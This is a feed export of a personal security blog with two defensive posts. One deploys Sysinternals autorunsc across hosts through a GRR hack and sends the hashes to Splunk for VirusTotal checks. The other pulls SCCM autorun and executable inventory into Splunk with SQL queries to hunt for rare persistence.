tag:blogger.com,1999:blog-21398557892437467402024-03-13T23:27:14.922-07:00Information on Securitytwitter.com/keithtylerUnknownnoreply@blogger.comBlogger9125tag:blogger.com,1999:blog-2139855789243746740.post-88293659304972499032019-10-09T19:28:00.001-07:002019-10-11T20:55:16.959-07:00Enterprise Autorun Collections with autorunsc.exe<br />
Anyone know of a tool that can collect the hash of autorun locations as thorough as Mark Russinovich's <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns" target="_blank">autoruns </a>tool? I thought it would be nice to have that level of detail reported to Splunk on all systems to check for badness in Virustotal, find the low hanging malware fruit.<br />
<br />
Since I enjoy learning python and powershell, I put together a GRR <a href="https://grr-doc.readthedocs.io/en/latest/investigating-with-grr/pushing-code.html#deploying-arbitrary-python-code" target="_blank">python_hack</a> which launches autorunsc.exe and sends the output to Splunk. With <a href="https://github.com/google/grr" target="_blank">GRR Rapid Response</a> you can launch this as a hunt on all hosts.<br />
<br />
Full script is on <a href="https://github.com/keithtyler/autorun_hunter" target="_blank">github</a>, here's a breakdown of what I (and thanks to the folks at stackoverflow.com) put together.<br />
<br />
Process flow:<br />
<ul>
<li>GRR python hack decodes, unzip then writes autorunsc.exe to target host</li>
<li>Python hack then executes powershell encoded command</li>
<li>Powershell command runs autorunsc.exe and reports specified details to event log via Write-EventLog where your log collector will pickup and forward on to your SIEM</li>
</ul>
GRR has some weirdness with very long lines, so had to break up the binary in two parts. autorunsc.exe binary is base64 encoded and assigned as autorunscBinary00 and autorunscBinary01. Since the binary is over 2000 lines, they are collapsed in the picture below for easier reading.<br />
<br />
I encoded autorunsc.exe and the powershell script (b64Powershell variable) using this:<br />
<blockquote class="tr_bq">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">$data = { powershell script here } </span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">$Bytes = [System.Text.Encoding]::Unicode.GetBytes($data)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">$EncodedData =[Convert]::ToBase64String($Bytes)$EncodedData</span></blockquote>
For the binary file I used powershell get-content and assigned that output to <span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">$data</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-bTDzEMctKIk/XZ1z3bWeFMI/AAAAAAAA9Ns/Pc7rJMSbSiYbccPkJwnNKKxLXBMgJdO0QCLcBGAsYHQ/s1600/py.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1472" data-original-width="1600" height="587" src="https://1.bp.blogspot.com/-bTDzEMctKIk/XZ1z3bWeFMI/AAAAAAAA9Ns/Pc7rJMSbSiYbccPkJwnNKKxLXBMgJdO0QCLcBGAsYHQ/s640/py.PNG" width="640" /></a></div>
Here is the decoded powershell command in b64Powershell variable:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-yRBXkjqQ2e8/XZ12BrUXVFI/AAAAAAAA9N4/OwJ5MlPITg0jU-KXGivJSKQ3bi7nUv4vgCLcBGAsYHQ/s1600/ps.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="1600" height="192" src="https://1.bp.blogspot.com/-yRBXkjqQ2e8/XZ12BrUXVFI/AAAAAAAA9N4/OwJ5MlPITg0jU-KXGivJSKQ3bi7nUv4vgCLcBGAsYHQ/s640/ps.PNG" width="640" /></a></div>
<br />
There are more fields available from autorunsc.exe, but for the purpose of checking hashes in Virustotal, i'm interested in SHA256, location, path and signer. Each of those values returned by autorunsc will be appended with "Field=" so its easier to work with in Splunk. Example query to view results:<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">index=windows GRR EventID=187 | table Workstation hash Location Path Signer</span></blockquote>
<br />
Now that you have all the hashes of autorun's in your SIEM, you can pipe those hashes to a <a href="http://there%20are%20more%20fields%20that%20autorunsc.exe%20outputs%20but%20for%20my%20purpose%2C%20i%20only%20need%20sha256%2C%20location%2C%20path%20and%20signer.%20in%20your%20siem%20you%20can%20search%20for%20event%20id%27s%20of%20%27187%27%20under%20application%20log./" target="_blank">Virustotal Splunk app</a> and find some low hanging malware fruit!<br />
<br />
<br />
<br />
<br />Unknownnoreply@blogger.comtag:blogger.com,1999:blog-2139855789243746740.post-35441324332642012372015-11-23T21:02:00.000-08:002015-11-23T21:12:30.760-08:00Microsoft's Accidental Enterprise DFIR Tool<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SCCM can be a goldmine when hunting for evil, all you need to do is enable some inventory collections, send them to Splunk and get creative. While the data is snapshot in time (usually the last 24-hours) it can be a great first start when dealing with incidents, plus most enterprises already have SCCM.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In this post all breeze over the setup & configuration of and focus more on some of the searches you can do to find evil. As a bonus, you can you use this to monitor the health and coverage of your security agents with some pretty dashboards in Splunk.</span></div>
<b id="docs-internal-guid-f6e93494-379b-bac3-b7ed-f6a30cbea32b" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Some enterprise wide hunting-for-evil examples I’ll cover:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Finding service outliers</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Find least frequency of occurrence for persistent mechanisms via autoruns.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Find least frequency of occurrence of installed services.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Least frequency of occurrence of executables.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Services running from abnormal paths.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Triage enterprise using IoC</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Ingredients</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1 Microsoft SCCM server + access to the SCCM SQL server.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1 Splunk server</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1 Splunk DB Connect App</span></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-size: xx-small;"><span style="font-family: "arial"; line-height: 20.24px; white-space: pre-wrap;">* </span><span style="font-family: "arial"; line-height: 1.38; white-space: pre-wrap;">Adult beverage is optional but strongly recommended. </span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Preparing SCCM</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In SCCM enable the collection of Autoruns, Browser Helper Objects (BHO) and inventory collection of all executables. This collected data will be pulled into Splunk or directly querying with SQL statements.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Preparing DB Connect App in Splunk</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The DB app executes the SQL queries on a scheduled basis and dumps them into a defined index. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Under "Identities" add in MS SQL server credentials. In "Connections" add in SCCM SQL server. Click validate to make sure everything is configured correctly. </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Y93x89Vt-mA/VlPqCnRuwgI/AAAAAAAAuVw/Q5KcKE4jQmc/s1600/NewConnection.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="http://3.bp.blogspot.com/-Y93x89Vt-mA/VlPqCnRuwgI/AAAAAAAAuVw/Q5KcKE4jQmc/s640/NewConnection.tiff" width="640" /></a></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Now to get useful data into Splunk you’ll need to make SQL queries. Your SQL server table names will probably be different so verify directly on SQL manager to make sure your queries work and pull back data in a way that is expected. As an example we’ll use autoruns, however this process will be the same for all queries.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Autorun lookup</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Autorun has a ton of good info so you’ll want to have this data imported after the collection process runs, default (I think) is every 24-hours. Here is the query I used to import all the autorun data:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SELECT [Name] AS Hostname ,</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[Description0] ,</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[FileName0] ,</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[FilePropertiesHash0] ,</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[FilePropertiesHashEx0] ,</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[FileVersion0] ,</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[Location0] ,</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[Product0] ,</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[ProductVersion0] ,</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[Publisher0] ,</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[StartupType0] ,</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[StartupValue0] </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">FROM [SCCM].[dbo].[v_GS_AUTOSTART_SOFTWARE] </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">LEFT JOIN [SCCM].[dbo].[v_ActiveClients] Name ON ResourceID = MachineResourceID</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The LEFT JOIN statement will give you the hostname based upon the ResourceID along with all of the autorun details. Modify this to your needs and paste in “Input SQL” field.</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Select batch and past in your SQL statement:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="352px;" src="https://lh6.googleusercontent.com/fYRhpFKwj78Vgn90aB9KcJ-DYGjZ28vmFTxI3zepoO9LgbCmWgF-gvyPTN45RzbP-WoX6X3vKMdLFnWjBj4SVkyEhsjWhZgmlaG1QXyolrgyFlukmzB7VhgZTpe8_Ma7dPc6hWH2" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624px;" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Click more settings and set the lookup period to every 24-hours, set sourcetype and index:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="410px;" src="https://lh3.googleusercontent.com/AzqkRPqEKa50EURCHtsqJLh2PeZcrpQ0B0Hqg0-8fdFagZOp6-FIp6Fnlowic1uDymcxWMKyoUd_FbSPBhZz-tpx7VzSZvWi7ASi3pLi-WROP-4kAPYS0C1syl8Ht0eAC0ca47b9" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="544px;" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Save the input, take a swig and you’re done.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Hunting</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you’re not able to import the entire inventory of executables due to $plunk license, consider outputting the aggregated data from these examples or investigate Elasticsearch. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Since we now have all autorun data going to Splunk, we can use the following query to show autorun persistence that appear on less than 10 systems in the enterprise (by filename).</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="105px;" src="https://lh3.googleusercontent.com/JnlUGE9jAvHnT3N3pSrALXdl1GK3HS6xeaZX_d8aFPe5yIg1owbOPEcPR-gQLMTXjzCK8h6MGH93DI-4iw9MlNm0T8Erdxh4_e8MvRsxoSFBuzsQZhmoUXn-52P8Z_7qFzDynn3s" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624px;" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
